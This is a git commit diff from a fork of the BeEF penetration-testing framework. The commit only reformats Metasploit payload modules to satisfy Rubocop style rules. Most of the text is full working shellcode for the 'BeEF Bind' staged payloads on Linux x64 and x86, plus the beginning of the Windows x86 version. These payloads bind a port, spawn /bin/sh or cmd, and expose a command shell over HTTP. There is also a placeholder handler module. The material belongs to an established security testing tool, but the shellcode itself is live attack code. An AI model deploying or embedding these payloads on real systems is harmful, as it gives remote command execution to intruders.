Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Modules: Resolve many Rubocop violations

Browse Source
This commit is contained in:
Brendan Coles
2022-01-22 12:46:42 +00:00
parent bbe805f017
commit a64480dfab
317 changed files with 3238 additions and 3965 deletions
Download Patch File Download Diff File Expand all files Collapse all files

114
modules/exploits/beefbind/shellcode_sources/msf/beef_bind-handler.rb
View File

@@ -3,71 +3,65 @@
##
module Msf
module Handler
module Handler
###
#
# This module implements the Bind TCP handler placeholder only.
#
###
module BeefBind
include Msf::Handler
###
#
# This module implements the Bind TCP handler placeholder only.
#
###
module BeefBind
#
# Returns the handler specific string representation
#
def self.handler_type
'beef_bind'
end
include Msf::Handler
#
# Returns the connection oriented general handler type
#
def self.general_handler_type
'bind'
end
#
# Returns the handler specific string representation
#
def self.handler_type
return "beef_bind"
end
#
# Initializes a bind handler and adds the options common to all bind
# payloads, such as local port.
#
def initialize(info = {})
super
register_options(
[
Opt::LPORT(4444)
# OptAddress.new('RHOST', [false, 'The target address', '']),
], Msf::Handler::BeefBind
)
end
#
# Returns the connection oriented general handler type
#
def self.general_handler_type
"bind"
end
#
# Placeholder only
#
def cleanup_handler; end
#
# Initializes a bind handler and adds the options common to all bind
# payloads, such as local port.
#
def initialize(info = {})
super
register_options(
[
Opt::LPORT(4444),
#OptAddress.new('RHOST', [false, 'The target address', '']),
], Msf::Handler::BeefBind)
end
#
# Placeholder only
#
def add_handler(_opts = {})
# Start a new handler
start_handler
end
#
# Placeholder only
#
def cleanup_handler
end
#
# Placeholder only
#
def add_handler(opts={})
# Start a new handler
start_handler
end
#
# Placeholder only
#
def start_handler
end
#
# Placeholder only
#
def stop_handler
end
#
# Placeholder only
#
def start_handler; end
end
end
#
# Placeholder only
#
def stop_handler; end
end
end
end

137
modules/exploits/beefbind/shellcode_sources/msf/beef_bind-stage-linux-x64.rb
View File

@@ -10,76 +10,73 @@ require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
module MetasploitModule
include Msf::Payload::Linux
include Msf::Sessions::CommandShellOptions
include Msf::Payload::Linux
include Msf::Sessions::CommandShellOptions
def initialize(info = {})
super(merge_info(info,
'Name' => 'BeEF Bind Linux Command Shell Stage (stage x64)',
'Description' => 'Spawn a piped command shell (staged) with an HTTP interface',
'Author' => ['Bart Leppens'],
'License' => BSD_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_X64,
'Session' => Msf::Sessions::CommandShell,
'PayloadCompat' =>
{
'Convention' => 'beef_bind'
},
'Stage' =>
{
'Offsets' =>
{
'LPORT' => [165, 'n']
},
'Payload' =>
"\xfc\x48\x31\xd2\x6a\x02\x41\x5e\x52\x48\x89\xe7\x6a\x16\x58\x0f" \
"\x05\x49\xff\xce\x4d\x85\xf6\x74\x02\xeb\xed\x6a\x39\x58\x0f\x05" \
"\x83\xf8\x00\x0f\x84\xdd\x01\x00\x00\x48\x31\xff\x8b\x7c\x24\x08" \
"\x6a\x03\x58\x0f\x05\x8b\x7c\x24\x04\x6a\x03\x58\x0f\x05\x8b\x3c" \
"\x24\x6a\x04\x5e\x48\x31\xd2\xba\x00\x08\x00\x00\x6a\x48\x58\x0f" \
"\x05\x48\x31\xff\x68\x00\x10\x00\x00\x5e\x6a\x07\x5a\x6a\x22\x41" \
"\x5a\x57\x57\x41\x59\x41\x58\x6a\x09\x58\x0f\x05\x49\x89\xc6\x48" \
"\x31\xd2\x6a\x01\x5e\x6a\x02\x5f\x6a\x29\x58\x0f\x05\x48\x89\xc3" \
"\x6a\x01\x49\x89\xe2\x6a\x08\x41\x58\x6a\x02\x5a\x6a\x01\x5e\x48" \
"\x89\xdf\x6a\x36\x58\x0f\x05\x58\x48\x31\xc0\x6a\x10\x5a\x50\x50" \
"\xc7\x04\x24\x02\x00\x11\x5c\x48\x89\xe6\x48\x89\xdf\x6a\x31\x58" \
"\x0f\x05\x58\x58\x48\x31\xf6\x48\x89\xdf\x6a\x32\x58\x0f\x05\x48" \
"\x31\xd2\x48\x31\xf6\x48\x89\xdf\x6a\x2b\x58\x0f\x05\x49\x89\xc7" \
"\x48\x89\xdf\x6a\x03\x58\x0f\x05\xb9\x00\x10\x00\x00\x48\xff\xc9" \
"\x4c\x89\xf3\x48\x01\xcb\xc6\x03\x00\xe3\x02\xeb\xf0\x48\x31\xd2" \
"\x4c\x89\xff\x4c\x89\xf6\x66\xba\x00\x04\x6a\x00\x58\x0f\x05\xb9" \
"\x00\x04\x00\x00\x4c\x89\xf3\x81\x3b\x63\x6d\x64\x3d\x74\x0a\x48" \
"\xff\xc3\x48\xff\xc9\xe3\x34\xeb\xee\x48\x31\xff\x48\x89\xd9\x48" \
"\x83\xc1\x03\x48\x89\xce\x8b\x7c\x24\x0c\x48\xff\xc6\x6a\x01\x5a" \
"\x6a\x01\x58\x0f\x05\x80\x3e\x0a\x75\xf0\x6a\x23\x58\x6a\x00\x6a" \
"\x01\x48\x89\xe7\x48\x31\xf6\x0f\x05\x58\x58\xe8\x62\x00\x00\x00" \
"\x48\x54\x54\x50\x2f\x31\x2e\x31\x20\x32\x30\x30\x20\x4f\x4b\x0d" \
"\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x74" \
"\x65\x78\x74\x2f\x68\x74\x6d\x6c\x0d\x0a\x41\x63\x63\x65\x73\x73" \
"\x2d\x43\x6f\x6e\x74\x72\x6f\x6c\x2d\x41\x6c\x6c\x6f\x77\x2d\x4f" \
"\x72\x69\x67\x69\x6e\x3a\x20\x2a\x0d\x0a\x43\x6f\x6e\x74\x65\x6e" \
"\x74\x2d\x4c\x65\x6e\x67\x74\x68\x3a\x20\x33\x30\x34\x38\x0d\x0a" \
"\x0d\x0a\x5e\x4c\x89\xf7\x48\x81\xc7\x00\x04\x00\x00\xb9\x62\x00" \
"\x00\x00\xf3\xa4\x48\x31\xff\x8b\x3c\x24\x4c\x89\xf6\x48\x81\xc6" \
"\x00\x04\x00\x00\x48\x83\xc6\x62\xba\x86\x0b\x00\x00\x48\x31\xc0" \
"\x0f\x05\x4c\x89\xff\x4c\x89\xf6\x48\x81\xc6\x00\x04\x00\x00\xba" \
"\xe8\x0b\x00\x00\x6a\x01\x58\x0f\x05\x4c\x89\xff\x6a\x03\x58\x0f" \
"\x05\xe9\x69\xfe\xff\xff\x48\x31\xff\x8b\x7c\x24\x0c\x6a\x03\x58" \
"\x0f\x05\x48\x31\xff\x6a\x03\x58\x0f\x05\x8b\x7c\x24\x08\x6a\x20" \
"\x58\x0f\x05\x8b\x3c\x24\x6a\x03\x58\x0f\x05\x48\x31\xff\x48\xff" \
"\xc7\x6a\x03\x58\x0f\x05\x8b\x7c\x24\x04\x6a\x20\x58\x0f\x05\x48" \
"\x31\xff\x48\x31\xf6\x48\x31\xd2\x6a\x75\x58\x0f\x05\x6a\x3b\x58" \
"\x48\xbf\x2f\x62\x69\x6e\x2f\x73\x68\x00\x57\x48\x89\xe7\x48\x31" \
"\xf6\x48\x31\xd2\x0f\x05"
}))
end
def initialize(info = {})
super(merge_info(info,
'Name' => 'BeEF Bind Linux Command Shell Stage (stage x64)',
'Description' => 'Spawn a piped command shell (staged) with an HTTP interface',
'Author' => [ 'Bart Leppens' ],
'License' => BSD_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_X64,
'Session' => Msf::Sessions::CommandShell,
'PayloadCompat' =>
{
'Convention' => 'beef_bind'
},
'Stage' =>
{
'Offsets' =>
{
'LPORT' => [ 165, 'n' ]
},
'Payload' =>
"\xfc\x48\x31\xd2\x6a\x02\x41\x5e\x52\x48\x89\xe7\x6a\x16\x58\x0f" +
"\x05\x49\xff\xce\x4d\x85\xf6\x74\x02\xeb\xed\x6a\x39\x58\x0f\x05" +
"\x83\xf8\x00\x0f\x84\xdd\x01\x00\x00\x48\x31\xff\x8b\x7c\x24\x08" +
"\x6a\x03\x58\x0f\x05\x8b\x7c\x24\x04\x6a\x03\x58\x0f\x05\x8b\x3c" +
"\x24\x6a\x04\x5e\x48\x31\xd2\xba\x00\x08\x00\x00\x6a\x48\x58\x0f" +
"\x05\x48\x31\xff\x68\x00\x10\x00\x00\x5e\x6a\x07\x5a\x6a\x22\x41" +
"\x5a\x57\x57\x41\x59\x41\x58\x6a\x09\x58\x0f\x05\x49\x89\xc6\x48" +
"\x31\xd2\x6a\x01\x5e\x6a\x02\x5f\x6a\x29\x58\x0f\x05\x48\x89\xc3" +
"\x6a\x01\x49\x89\xe2\x6a\x08\x41\x58\x6a\x02\x5a\x6a\x01\x5e\x48" +
"\x89\xdf\x6a\x36\x58\x0f\x05\x58\x48\x31\xc0\x6a\x10\x5a\x50\x50" +
"\xc7\x04\x24\x02\x00\x11\x5c\x48\x89\xe6\x48\x89\xdf\x6a\x31\x58" +
"\x0f\x05\x58\x58\x48\x31\xf6\x48\x89\xdf\x6a\x32\x58\x0f\x05\x48" +
"\x31\xd2\x48\x31\xf6\x48\x89\xdf\x6a\x2b\x58\x0f\x05\x49\x89\xc7" +
"\x48\x89\xdf\x6a\x03\x58\x0f\x05\xb9\x00\x10\x00\x00\x48\xff\xc9" +
"\x4c\x89\xf3\x48\x01\xcb\xc6\x03\x00\xe3\x02\xeb\xf0\x48\x31\xd2" +
"\x4c\x89\xff\x4c\x89\xf6\x66\xba\x00\x04\x6a\x00\x58\x0f\x05\xb9" +
"\x00\x04\x00\x00\x4c\x89\xf3\x81\x3b\x63\x6d\x64\x3d\x74\x0a\x48" +
"\xff\xc3\x48\xff\xc9\xe3\x34\xeb\xee\x48\x31\xff\x48\x89\xd9\x48" +
"\x83\xc1\x03\x48\x89\xce\x8b\x7c\x24\x0c\x48\xff\xc6\x6a\x01\x5a" +
"\x6a\x01\x58\x0f\x05\x80\x3e\x0a\x75\xf0\x6a\x23\x58\x6a\x00\x6a" +
"\x01\x48\x89\xe7\x48\x31\xf6\x0f\x05\x58\x58\xe8\x62\x00\x00\x00" +
"\x48\x54\x54\x50\x2f\x31\x2e\x31\x20\x32\x30\x30\x20\x4f\x4b\x0d" +
"\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x74" +
"\x65\x78\x74\x2f\x68\x74\x6d\x6c\x0d\x0a\x41\x63\x63\x65\x73\x73" +
"\x2d\x43\x6f\x6e\x74\x72\x6f\x6c\x2d\x41\x6c\x6c\x6f\x77\x2d\x4f" +
"\x72\x69\x67\x69\x6e\x3a\x20\x2a\x0d\x0a\x43\x6f\x6e\x74\x65\x6e" +
"\x74\x2d\x4c\x65\x6e\x67\x74\x68\x3a\x20\x33\x30\x34\x38\x0d\x0a" +
"\x0d\x0a\x5e\x4c\x89\xf7\x48\x81\xc7\x00\x04\x00\x00\xb9\x62\x00" +
"\x00\x00\xf3\xa4\x48\x31\xff\x8b\x3c\x24\x4c\x89\xf6\x48\x81\xc6" +
"\x00\x04\x00\x00\x48\x83\xc6\x62\xba\x86\x0b\x00\x00\x48\x31\xc0" +
"\x0f\x05\x4c\x89\xff\x4c\x89\xf6\x48\x81\xc6\x00\x04\x00\x00\xba" +
"\xe8\x0b\x00\x00\x6a\x01\x58\x0f\x05\x4c\x89\xff\x6a\x03\x58\x0f" +
"\x05\xe9\x69\xfe\xff\xff\x48\x31\xff\x8b\x7c\x24\x0c\x6a\x03\x58" +
"\x0f\x05\x48\x31\xff\x6a\x03\x58\x0f\x05\x8b\x7c\x24\x08\x6a\x20" +
"\x58\x0f\x05\x8b\x3c\x24\x6a\x03\x58\x0f\x05\x48\x31\xff\x48\xff" +
"\xc7\x6a\x03\x58\x0f\x05\x8b\x7c\x24\x04\x6a\x20\x58\x0f\x05\x48" +
"\x31\xff\x48\x31\xf6\x48\x31\xd2\x6a\x75\x58\x0f\x05\x6a\x3b\x58" +
"\x48\xbf\x2f\x62\x69\x6e\x2f\x73\x68\x00\x57\x48\x89\xe7\x48\x31" +
"\xf6\x48\x31\xd2\x0f\x05"
}
))
end
# Stage encoding is safe for this payload
def encode_stage?
true
end
# Stage encoding is safe for this payload
def encode_stage?
true
end
end

135
modules/exploits/beefbind/shellcode_sources/msf/beef_bind-stage-linux-x86.rb
View File

@@ -10,75 +10,72 @@ require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
module MetasploitModule
include Msf::Payload::Linux
include Msf::Sessions::CommandShellOptions
include Msf::Payload::Linux
include Msf::Sessions::CommandShellOptions
def initialize(info = {})
super(merge_info(info,
'Name' => 'BeEF Bind Linux Command Shell Stage (stage x86)',
'Description' => 'Spawn a piped command shell (staged) with an HTTP interface',
'Author' => ['Bart Leppens'],
'License' => BSD_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_X86,
'Session' => Msf::Sessions::CommandShell,
'PayloadCompat' =>
{
'Convention' => 'beef_bind'
},
'Stage' =>
{
'Offsets' =>
{
'LPORT' => [168, 'n']
},
'Payload' =>
"\xfc\x31\xd2\x6a\x02\x59\x52\x52\x89\xe3\x6a\x2a\x58\xcd\x80\x49" \
"\x67\xe3\x02\xeb\xf1\x31\xdb\x6a\x02\x58\xcd\x80\x3d\x00\x00\x00" \
"\x00\x0f\x84\xe4\x01\x00\x00\x8b\x5c\x24\x08\x6a\x06\x58\xcd\x80" \
"\x8b\x5c\x24\x04\x6a\x06\x58\xcd\x80\x8b\x1c\x24\x6a\x04\x59\x68" \
"\x00\x08\x00\x00\x5a\x6a\x37\x58\xcd\x80\x6a\x00\x68\xff\xff\xff" \
"\xff\x6a\x22\x6a\x07\x68\x00\x10\x00\x00\x68\x00\x00\x00\x00\x89" \
"\xe3\x6a\x5a\x58\xcd\x80\x89\xc7\x81\xc4\x18\x00\x00\x00\x31\xd2" \
"\x31\xc0\x6a\x01\x5b\x50\x40\x50\x40\x50\x89\xe1\x6a\x66\x58\xcd" \
"\x80\x89\xc6\x81\xc4\x0c\x00\x00\x00\x6a\x0e\x5b\x6a\x04\x54\x6a" \
"\x02\x6a\x01\x56\x89\xe1\x6a\x66\x58\xcd\x80\x81\xc4\x14\x00\x00" \
"\x00\x6a\x02\x5b\x52\x68\x02\x00\x11\x5c\x89\xe1\x6a\x10\x51\x56" \
"\x89\xe1\x6a\x66\x58\xcd\x80\x81\xc4\x14\x00\x00\x00\x43\x43\x53" \
"\x56\x89\xe1\x6a\x66\x58\xcd\x80\x81\xc4\x08\x00\x00\x00\x43\x52" \
"\x52\x56\x89\xe1\x6a\x66\x58\xcd\x80\x81\xc4\x0c\x00\x00\x00\x96" \
"\x93\xb8\x06\x00\x00\x00\xcd\x80\xb9\x00\x10\x00\x00\x49\x89\xfb" \
"\x01\xcb\xc6\x03\x00\xe3\x05\xe9\xf1\xff\xff\xff\x66\xba\x00\x04" \
"\x89\xf9\x89\xf3\x6a\x03\x58\xcd\x80\x57\x56\x89\xfb\xb9\x00\x04" \
"\x00\x00\x81\x3b\x63\x6d\x64\x3d\x74\x09\x43\x49\xe3\x3a\xe9\xef" \
"\xff\xff\xff\x89\xd9\x81\xc1\x03\x00\x00\x00\x8b\x5c\x24\x14\x41" \
"\x6a\x01\x5a\x6a\x04\x58\xcd\x80\x80\x39\x0a\x75\xf2\x68\x00\x00" \
"\x00\x00\x68\x01\x00\x00\x00\x89\xe3\x31\xc9\xb8\xa2\x00\x00\x00" \
"\xcd\x80\x81\xc4\x08\x00\x00\x00\xe8\x62\x00\x00\x00\x48\x54\x54" \
"\x50\x2f\x31\x2e\x31\x20\x32\x30\x30\x20\x4f\x4b\x0d\x0a\x43\x6f" \
"\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x74\x65\x78\x74" \
"\x2f\x68\x74\x6d\x6c\x0d\x0a\x41\x63\x63\x65\x73\x73\x2d\x43\x6f" \
"\x6e\x74\x72\x6f\x6c\x2d\x41\x6c\x6c\x6f\x77\x2d\x4f\x72\x69\x67" \
"\x69\x6e\x3a\x20\x2a\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c" \
"\x65\x6e\x67\x74\x68\x3a\x20\x33\x30\x34\x38\x0d\x0a\x0d\x0a\x5e" \
"\x81\xc7\x00\x04\x00\x00\xb9\x62\x00\x00\x00\xf3\xa4\x5f\x5e\x8b" \
"\x1c\x24\x89\xf1\x81\xc1\x00\x04\x00\x00\x81\xc1\x62\x00\x00\x00" \
"\x68\x86\x0b\x00\x00\x5a\x6a\x03\x58\xcd\x80\x89\xfb\x89\xf1\x81" \
"\xc1\x00\x04\x00\x00\xba\xe8\x0b\x00\x00\x6a\x04\x58\xcd\x80\x6a" \
"\x06\x58\xcd\x80\x89\xf7\xe9\x63\xfe\xff\xff\x8b\x5c\x24\x0c\x6a" \
"\x06\x58\xcd\x80\x31\xdb\x6a\x06\x58\xcd\x80\x8b\x5c\x24\x08\x6a" \
"\x29\x58\xcd\x80\x8b\x1c\x24\x6a\x06\x58\xcd\x80\x31\xdb\x43\x6a" \
"\x06\x58\xcd\x80\x8b\x5c\x24\x04\x6a\x29\x58\xcd\x80\x31\xc0\x31" \
"\xdb\x31\xc9\x31\xd2\xb0\xa4\xcd\x80\x31\xc0\x50\x50\x68\x2f\x2f" \
"\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x6a\x0b\x58\xcd\x80"
}))
end
def initialize(info = {})
super(merge_info(info,
'Name' => 'BeEF Bind Linux Command Shell Stage (stage x86)',
'Description' => 'Spawn a piped command shell (staged) with an HTTP interface',
'Author' => [ 'Bart Leppens' ],
'License' => BSD_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_X86,
'Session' => Msf::Sessions::CommandShell,
'PayloadCompat' =>
{
'Convention' => 'beef_bind'
},
'Stage' =>
{
'Offsets' =>
{
'LPORT' => [ 168, 'n' ]
},
'Payload' =>
"\xfc\x31\xd2\x6a\x02\x59\x52\x52\x89\xe3\x6a\x2a\x58\xcd\x80\x49" +
"\x67\xe3\x02\xeb\xf1\x31\xdb\x6a\x02\x58\xcd\x80\x3d\x00\x00\x00" +
"\x00\x0f\x84\xe4\x01\x00\x00\x8b\x5c\x24\x08\x6a\x06\x58\xcd\x80" +
"\x8b\x5c\x24\x04\x6a\x06\x58\xcd\x80\x8b\x1c\x24\x6a\x04\x59\x68" +
"\x00\x08\x00\x00\x5a\x6a\x37\x58\xcd\x80\x6a\x00\x68\xff\xff\xff" +
"\xff\x6a\x22\x6a\x07\x68\x00\x10\x00\x00\x68\x00\x00\x00\x00\x89" +
"\xe3\x6a\x5a\x58\xcd\x80\x89\xc7\x81\xc4\x18\x00\x00\x00\x31\xd2" +
"\x31\xc0\x6a\x01\x5b\x50\x40\x50\x40\x50\x89\xe1\x6a\x66\x58\xcd" +
"\x80\x89\xc6\x81\xc4\x0c\x00\x00\x00\x6a\x0e\x5b\x6a\x04\x54\x6a" +
"\x02\x6a\x01\x56\x89\xe1\x6a\x66\x58\xcd\x80\x81\xc4\x14\x00\x00" +
"\x00\x6a\x02\x5b\x52\x68\x02\x00\x11\x5c\x89\xe1\x6a\x10\x51\x56" +
"\x89\xe1\x6a\x66\x58\xcd\x80\x81\xc4\x14\x00\x00\x00\x43\x43\x53" +
"\x56\x89\xe1\x6a\x66\x58\xcd\x80\x81\xc4\x08\x00\x00\x00\x43\x52" +
"\x52\x56\x89\xe1\x6a\x66\x58\xcd\x80\x81\xc4\x0c\x00\x00\x00\x96" +
"\x93\xb8\x06\x00\x00\x00\xcd\x80\xb9\x00\x10\x00\x00\x49\x89\xfb" +
"\x01\xcb\xc6\x03\x00\xe3\x05\xe9\xf1\xff\xff\xff\x66\xba\x00\x04" +
"\x89\xf9\x89\xf3\x6a\x03\x58\xcd\x80\x57\x56\x89\xfb\xb9\x00\x04" +
"\x00\x00\x81\x3b\x63\x6d\x64\x3d\x74\x09\x43\x49\xe3\x3a\xe9\xef" +
"\xff\xff\xff\x89\xd9\x81\xc1\x03\x00\x00\x00\x8b\x5c\x24\x14\x41" +
"\x6a\x01\x5a\x6a\x04\x58\xcd\x80\x80\x39\x0a\x75\xf2\x68\x00\x00" +
"\x00\x00\x68\x01\x00\x00\x00\x89\xe3\x31\xc9\xb8\xa2\x00\x00\x00" +
"\xcd\x80\x81\xc4\x08\x00\x00\x00\xe8\x62\x00\x00\x00\x48\x54\x54" +
"\x50\x2f\x31\x2e\x31\x20\x32\x30\x30\x20\x4f\x4b\x0d\x0a\x43\x6f" +
"\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x74\x65\x78\x74" +
"\x2f\x68\x74\x6d\x6c\x0d\x0a\x41\x63\x63\x65\x73\x73\x2d\x43\x6f" +
"\x6e\x74\x72\x6f\x6c\x2d\x41\x6c\x6c\x6f\x77\x2d\x4f\x72\x69\x67" +
"\x69\x6e\x3a\x20\x2a\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c" +
"\x65\x6e\x67\x74\x68\x3a\x20\x33\x30\x34\x38\x0d\x0a\x0d\x0a\x5e" +
"\x81\xc7\x00\x04\x00\x00\xb9\x62\x00\x00\x00\xf3\xa4\x5f\x5e\x8b" +
"\x1c\x24\x89\xf1\x81\xc1\x00\x04\x00\x00\x81\xc1\x62\x00\x00\x00" +
"\x68\x86\x0b\x00\x00\x5a\x6a\x03\x58\xcd\x80\x89\xfb\x89\xf1\x81" +
"\xc1\x00\x04\x00\x00\xba\xe8\x0b\x00\x00\x6a\x04\x58\xcd\x80\x6a" +
"\x06\x58\xcd\x80\x89\xf7\xe9\x63\xfe\xff\xff\x8b\x5c\x24\x0c\x6a" +
"\x06\x58\xcd\x80\x31\xdb\x6a\x06\x58\xcd\x80\x8b\x5c\x24\x08\x6a" +
"\x29\x58\xcd\x80\x8b\x1c\x24\x6a\x06\x58\xcd\x80\x31\xdb\x43\x6a" +
"\x06\x58\xcd\x80\x8b\x5c\x24\x04\x6a\x29\x58\xcd\x80\x31\xc0\x31" +
"\xdb\x31\xc9\x31\xd2\xb0\xa4\xcd\x80\x31\xc0\x50\x50\x68\x2f\x2f" +
"\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x6a\x0b\x58\xcd\x80"
}
))
end
# Stage encoding is safe for this payload
def encode_stage?
true
end
# Stage encoding is safe for this payload
def encode_stage?
true
end
end

225
modules/exploits/beefbind/shellcode_sources/msf/beef_bind-stage-windows-x86.rb
View File

@@ -2,7 +2,6 @@
# $Id: beef_bind-stage.rb 121018 Ty Miller @ Threat Intelligence$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@@ -15,123 +14,113 @@ require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
module MetasploitModule
include Msf::Payload::Windows
include Msf::Sessions::CommandShellOptions
include Msf::Payload::Windows
include Msf::Sessions::CommandShellOptions
def initialize(info = {})
super(merge_info(info,
'Name' => 'BeEF Bind Windows Command Shell Stage (stager)',
'Version' => '$Revision: 11421 $',
'Description' => 'Spawn a piped command shell (staged) with an HTTP interface',
'Author' => ['Ty Miller'],
'License' => BSD_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_X86,
'Session' => Msf::Sessions::CommandShellWindows,
'PayloadCompat' =>
{
'Convention' => 'beef_bind'
},
'Stage' =>
{
'Offsets' =>
{
'LPORT' => [511, 'n']
},
'Payload' =>
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31" \
"\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52" \
"\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" \
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1" \
"\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52" \
"\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85" \
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" \
"\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b" \
"\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d" \
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b" \
"\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3" \
"\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b" \
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b" \
"\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" \
"\x12\xeb\x86\x5d\xbb\x00\x10\x00\x00\x6a" \
"\x40\x53\x53\x6a\x00\x68\x58\xa4\x53\xe5" \
"\xff\xd5\x89\xc6\x68\x01\x00\x00\x00\x68" \
"\x00\x00\x00\x00\x68\x0c\x00\x00\x00\x68" \
"\x00\x00\x00\x00\x89\xe3\x68\x00\x00\x00" \
"\x00\x89\xe1\x68\x00\x00\x00\x00\x8d\x7c" \
"\x24\x0c\x57\x53\x51\x68\x3e\xcf\xaf\x0e" \
"\xff\xd5\x68\x00\x00\x00\x00\x89\xe3\x68" \
"\x00\x00\x00\x00\x89\xe1\x68\x00\x00\x00" \
"\x00\x8d\x7c\x24\x14\x57\x53\x51\x68\x3e" \
"\xcf\xaf\x0e\xff\xd5\x8b\x5c\x24\x08\x68" \
"\x00\x00\x00\x00\x68\x01\x00\x00\x00\x53" \
"\x68\xca\x13\xd3\x1c\xff\xd5\x8b\x5c\x24" \
"\x04\x68\x00\x00\x00\x00\x68\x01\x00\x00" \
"\x00\x53\x68\xca\x13\xd3\x1c\xff\xd5\x89" \
"\xf7\x68\x63\x6d\x64\x00\x89\xe3\xff\x74" \
"\x24\x10\xff\x74\x24\x14\xff\x74\x24\x0c" \
"\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7" \
"\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6" \
"\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e" \
"\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff" \
"\xd5\x89\xfe\xb9\xf8\x0f\x00\x00\x8d\x46" \
"\x08\xc6\x00\x00\x40\xe2\xfa\x56\x8d\xbe" \
"\x18\x04\x00\x00\xe8\x42\x00\x00\x00\x48" \
"\x54\x54\x50\x2f\x31\x2e\x31\x20\x32\x30" \
"\x30\x20\x4f\x4b\x0d\x0a\x43\x6f\x6e\x74" \
"\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20" \
"\x74\x65\x78\x74\x2f\x68\x74\x6d\x6c\x0d" \
"\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c" \
"\x65\x6e\x67\x74\x68\x3a\x20\x33\x30\x34" \
"\x38\x0d\x0a\x0d\x0a\x5e\xb9\x42\x00\x00" \
"\x00\xf3\xa4\x5e\x56\x68\x33\x32\x00\x00" \
"\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26" \
"\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4" \
"\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50" \
"\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f" \
"\xdf\xe0\xff\xd5\x97\x31\xdb\x53\x68\x02" \
"\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68" \
"\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7" \
"\xe9\x38\xff\xff\xd5\x53\x53\x57\x68\x74" \
"\xec\x3b\xe1\xff\xd5\x57\x97\x68\x75\x6e" \
"\x4d\x61\xff\xd5\x81\xc4\xa0\x01\x00\x00" \
"\x5e\x89\x3e\x6a\x00\x68\x00\x04\x00\x00" \
"\x89\xf3\x81\xc3\x08\x00\x00\x00\x53\xff" \
"\x36\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x54" \
"\x24\x64\xb9\x00\x04\x00\x00\x81\x3b\x63" \
"\x6d\x64\x3d\x74\x06\x43\x49\xe3\x3a\xeb" \
"\xf2\x81\xc3\x03\x00\x00\x00\x43\x53\x68" \
"\x00\x00\x00\x00\x8d\xbe\x10\x04\x00\x00" \
"\x57\x68\x01\x00\x00\x00\x53\x8b\x5c\x24" \
"\x70\x53\x68\x2d\x57\xae\x5b\xff\xd5\x5b" \
"\x80\x3b\x0a\x75\xda\x68\xe8\x03\x00\x00" \
"\x68\x44\xf0\x35\xe0\xff\xd5\x31\xc0\x50" \
"\x8d\x5e\x04\x53\x50\x50\x50\x8d\x5c\x24" \
"\x74\x8b\x1b\x53\x68\x18\xb7\x3c\xb3\xff" \
"\xd5\x85\xc0\x74\x44\x8b\x46\x04\x85\xc0" \
"\x74\x3d\x68\x00\x00\x00\x00\x8d\xbe\x14" \
"\x04\x00\x00\x57\x68\xa6\x0b\x00\x00\x8d" \
"\xbe\x5a\x04\x00\x00\x57\x8d\x5c\x24\x70" \
"\x8b\x1b\x53\x68\xad\x9e\x5f\xbb\xff\xd5" \
"\x6a\x00\x68\xe8\x0b\x00\x00\x8d\xbe\x18" \
"\x04\x00\x00\x57\xff\x36\x68\xc2\xeb\x38" \
"\x5f\xff\xd5\xff\x36\x68\xc6\x96\x87\x52" \
"\xff\xd5\xe9\x58\xfe\xff\xff"
}))
end
def initialize(info = {})
super(merge_info(info,
'Name' => 'BeEF Bind Windows Command Shell Stage (stager)',
'Version' => '$Revision: 11421 $',
'Description' => 'Spawn a piped command shell (staged) with an HTTP interface',
'Author' => [ 'Ty Miller' ],
'License' => BSD_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_X86,
'Session' => Msf::Sessions::CommandShellWindows,
'PayloadCompat' =>
{
'Convention' => 'beef_bind'
},
'Stage' =>
{
'Offsets' =>
{
'LPORT' => [ 511, 'n' ]
},
'Payload' =>
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31" +
